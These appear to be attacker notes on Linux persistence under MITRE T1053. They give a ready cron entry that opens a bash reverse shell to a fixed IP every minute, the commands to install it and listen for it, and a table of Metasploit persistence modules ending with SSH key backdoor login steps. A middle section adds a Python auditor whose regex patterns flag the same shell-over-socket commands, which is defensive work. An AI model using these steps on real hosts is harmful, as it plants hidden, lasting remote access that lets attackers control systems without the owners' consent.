MITRE Technique: https://attack.mitre.org/techniques/T1053/
Persistence via Cronjobs:
Create a cron entry that runs every minute and opens a reverse connection to our attacking machine, and save it to a file named cron.
*** Specify the attacking machine's IP, because it's a reverse shell:
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.203.156.3/7777 0>&1'" > cron
Then to add it as a cronjob:
crontab -i cron
Then listen to the specified port:
nc -nvlp <PORT>
And we should get a connection...
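Seen from the defending side, an entry like the one above stands out when crontab contents are reviewed. The following is an added example, not part of the original notes: a small Python auditor that parses crontab lines and flags commands matching shell-over-socket patterns. The pattern list, the function names and the sample crontab (using the documentation address 192.0.2.10) are assumptions constructed for illustration.

```python
import re

# Illustrative patterns for shell-over-socket commands; not an exhaustive list.
SUSPICIOUS = {
    "dev_tcp_redirect": re.compile(r"/dev/(tcp|udp)/[^\s/]+/\d+"),
    "interactive_shell": re.compile(r"\b(ba|z|da)?sh\s+-i\b"),
    "netcat_exec": re.compile(r"\b(nc|ncat|netcat)\b.*\s-(e|c)\b"),
}
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

# Constructed sample in per-user crontab format; 192.0.2.10 is a documentation address.
SAMPLE = """\
# nightly backup
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.0.2.10/7777 0>&1'
@reboot /usr/bin/logger "host started"
"""

def parse_entry(line, system=False):
    """Return (schedule, user, command), or None for comments, env lines and blanks."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_LINE.match(line):
        return None
    nfields = 1 if line.startswith("@") else 5   # @reboot etc. use one schedule field
    lead = nfields + (1 if system else 0)        # /etc/crontab adds a user column
    parts = line.split(None, lead)
    if len(parts) <= lead:
        return None                              # malformed: no command present
    user = parts[nfields] if system else None
    return " ".join(parts[:nfields]), user, parts[-1]

def audit(text, system=False):
    """Flag crontab jobs whose command matches a SUSPICIOUS pattern."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        entry = parse_entry(raw, system)
        if entry is None:
            continue
        schedule, user, command = entry
        hits = [name for name, rx in SUSPICIOUS.items() if rx.search(command)]
        if hits and schedule == "* * * * *":
            hits.append("every_minute")          # rapid re-execution raises priority
        if hits:
            findings.append({"line": lineno, "user": user, "schedule": schedule,
                             "command": command, "hits": hits})
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

To review a live host, pass the output of `crontab -l` for each user to `audit()`, and pass the contents of /etc/crontab and the files under /etc/cron.d with `system=True`.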
Persistence MSF Modules:
search platform:linux persistence
| Module | Description |
|---|---|
| exploit/linux/local/apt_package_manager_persistence | This module will run a payload when the package manager is used. No handler is run automatically, so you must configure an appropriate exploit/multi/handler to connect. This module creates a pre-invoke hook for APT in apt.conf.d. The hook name syntax is numeric followed by text. |
| exploit/linux/local/cron_persistence | This module will create a cron or crontab entry to execute a payload. The module includes the ability to automatically clean up those entries to prevent multiple executions. syslog will get a copy of the cron entry. |
| exploit/linux/local/service_persistence | This module will create a service on the box, and mark it for auto-restart. We need enough access to write service files and potentially restart services. |
| post/linux/manage/sshkey_persistence # BEST METHOD | This module will add an SSH key to a specified user (or all), to allow remote login via SSH at any time. set CREATESSHFOLDER true; set SESSION <session_id>. Then create a file and add the SSH key to it with limited permissions: chmod 400 ssh_key. Then log in with SSH: ssh -i ssh_key root@<ip> |